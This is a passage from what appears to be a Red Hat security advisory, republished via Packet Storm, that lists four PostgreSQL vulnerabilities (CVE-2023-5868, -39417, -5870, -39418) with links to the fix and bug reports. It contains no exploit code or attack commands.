* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

* postgresql: MERGE fails to enforce UPDATE or SELECT row security policies (CVE-2023-39418)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2228112  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Source

Packet Storm